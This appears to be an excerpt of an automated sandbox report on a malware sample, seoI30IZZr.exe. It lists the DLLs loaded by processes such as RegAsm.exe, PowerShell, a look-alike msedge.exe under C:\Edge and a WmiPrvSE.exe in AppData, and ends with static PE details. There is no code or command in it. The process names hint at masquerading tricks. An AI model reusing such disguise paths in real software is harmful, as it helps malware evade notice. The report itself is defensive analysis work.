Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Edge\msedge.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Edge\msedge.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Edge\msedge.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Edge\msedge.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Edge\msedge.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Edge\msedge.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Edge\msedge.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Edge\msedge.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Edge\msedge.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Edge\msedge.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Edge\msedge.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Edge\msedge.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Edge\msedge.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Edge\msedge.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Edge\msedge.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Edge\msedge.exe	Section loaded: ktmw32.dll	Jump to behavior
Source: C:\Edge\msedge.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Edge\msedge.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Edge\msedge.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Edge\msedge.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Edge\msedge.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Edge\msedge.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\Edge\msedge.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\Edge\msedge.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Edge\msedge.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Edge\msedge.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Edge\msedge.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Edge\msedge.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Edge\msedge.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Edge\msedge.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Edge\msedge.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Edge\msedge.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Edge\msedge.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Edge\msedge.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Edge\msedge.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Edge\msedge.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: mswsock.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: dnsapi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: winnsi.dll
Source: C:\Edge\msedge.exe	Section loaded: mscoree.dll
Source: C:\Edge\msedge.exe	Section loaded: kernel.appcore.dll
Source: C:\Edge\msedge.exe	Section loaded: version.dll
Source: C:\Edge\msedge.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Edge\msedge.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Edge\msedge.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Edge\msedge.exe	Section loaded: uxtheme.dll
Source: C:\Edge\msedge.exe	Section loaded: windows.storage.dll
Source: C:\Edge\msedge.exe	Section loaded: wldp.dll
Source: C:\Edge\msedge.exe	Section loaded: profapi.dll
Source: C:\Edge\msedge.exe	Section loaded: cryptsp.dll
Source: C:\Edge\msedge.exe	Section loaded: rsaenh.dll
Source: C:\Edge\msedge.exe	Section loaded: cryptbase.dll
Source: C:\Edge\msedge.exe	Section loaded: sspicli.dll
Source: C:\Edge\msedge.exe	Section loaded: mscoree.dll
Source: C:\Edge\msedge.exe	Section loaded: kernel.appcore.dll
Source: C:\Edge\msedge.exe	Section loaded: version.dll
Source: C:\Edge\msedge.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Edge\msedge.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Edge\msedge.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Edge\msedge.exe	Section loaded: uxtheme.dll
Source: C:\Edge\msedge.exe	Section loaded: windows.storage.dll
Source: C:\Edge\msedge.exe	Section loaded: wldp.dll
Source: C:\Edge\msedge.exe	Section loaded: profapi.dll
Source: C:\Edge\msedge.exe	Section loaded: cryptsp.dll
Source: C:\Edge\msedge.exe	Section loaded: rsaenh.dll
Source: C:\Edge\msedge.exe	Section loaded: cryptbase.dll
Source: C:\Edge\msedge.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\WmiPrvSE.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\WmiPrvSE.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\WmiPrvSE.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\WmiPrvSE.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\WmiPrvSE.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\WmiPrvSE.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\WmiPrvSE.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\WmiPrvSE.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\WmiPrvSE.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\WmiPrvSE.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\WmiPrvSE.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\WmiPrvSE.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: mswsock.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: dnsapi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: winnsi.dll
Source: C:\Edge\msedge.exe	Section loaded: mscoree.dll
Source: C:\Edge\msedge.exe	Section loaded: kernel.appcore.dll
Source: C:\Edge\msedge.exe	Section loaded: version.dll
Source: C:\Edge\msedge.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Edge\msedge.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Edge\msedge.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Edge\msedge.exe	Section loaded: uxtheme.dll
Source: C:\Edge\msedge.exe	Section loaded: windows.storage.dll
Source: C:\Edge\msedge.exe	Section loaded: wldp.dll
Source: C:\Edge\msedge.exe	Section loaded: profapi.dll
Source: C:\Edge\msedge.exe	Section loaded: cryptsp.dll
Source: C:\Edge\msedge.exe	Section loaded: rsaenh.dll
Source: C:\Edge\msedge.exe	Section loaded: cryptbase.dll
Source: C:\Edge\msedge.exe	Section loaded: sspicli.dll
Source: C:\Edge\msedge.exe	Section loaded: ktmw32.dll
Source: C:\Edge\msedge.exe	Section loaded: rasapi32.dll
Source: C:\Edge\msedge.exe	Section loaded: rasman.dll
Source: C:\Edge\msedge.exe	Section loaded: rtutils.dll
Source: C:\Edge\msedge.exe	Section loaded: mswsock.dll
Source: C:\Edge\msedge.exe	Section loaded: winhttp.dll
Source: C:\Edge\msedge.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Edge\msedge.exe	Section loaded: iphlpapi.dll
Source: C:\Edge\msedge.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Edge\msedge.exe	Section loaded: dhcpcsvc.dll
Source: C:\Edge\msedge.exe	Section loaded: dnsapi.dll
Source: C:\Edge\msedge.exe	Section loaded: winnsi.dll
Source: C:\Edge\msedge.exe	Section loaded: rasadhlp.dll
Source: C:\Edge\msedge.exe	Section loaded: propsys.dll
Source: C:\Edge\msedge.exe	Section loaded: apphelp.dll
Source: C:\Edge\msedge.exe	Section loaded: dlnashext.dll
Source: C:\Edge\msedge.exe	Section loaded: wpdshext.dll
Source: C:\Edge\msedge.exe	Section loaded: edputil.dll
Source: C:\Edge\msedge.exe	Section loaded: urlmon.dll
Source: C:\Edge\msedge.exe	Section loaded: iertutil.dll
Source: C:\Edge\msedge.exe	Section loaded: srvcli.dll
Source: C:\Edge\msedge.exe	Section loaded: netutils.dll
Source: C:\Edge\msedge.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Edge\msedge.exe	Section loaded: wintypes.dll
Source: C:\Edge\msedge.exe	Section loaded: appresolver.dll
Source: C:\Edge\msedge.exe	Section loaded: bcp47langs.dll
Source: C:\Edge\msedge.exe	Section loaded: slc.dll
Source: C:\Edge\msedge.exe	Section loaded: userenv.dll
Source: C:\Edge\msedge.exe	Section loaded: sppc.dll
Source: C:\Edge\msedge.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Edge\msedge.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: mswsock.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: dnsapi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\WmiPrvSE.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\WmiPrvSE.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\WmiPrvSE.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\WmiPrvSE.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\WmiPrvSE.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\WmiPrvSE.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\WmiPrvSE.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\WmiPrvSE.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\WmiPrvSE.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\WmiPrvSE.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\WmiPrvSE.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\WmiPrvSE.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll

Source: C:\Users\user\Desktop\seoI30IZZr.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Source: seoI30IZZr.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: seoI30IZZr.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: seoI30IZZr.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: seoI30IZZr.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: seoI30IZZr.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: seoI30IZZr.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: seoI30IZZr.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: seoI30IZZr.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: seoI30IZZr.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

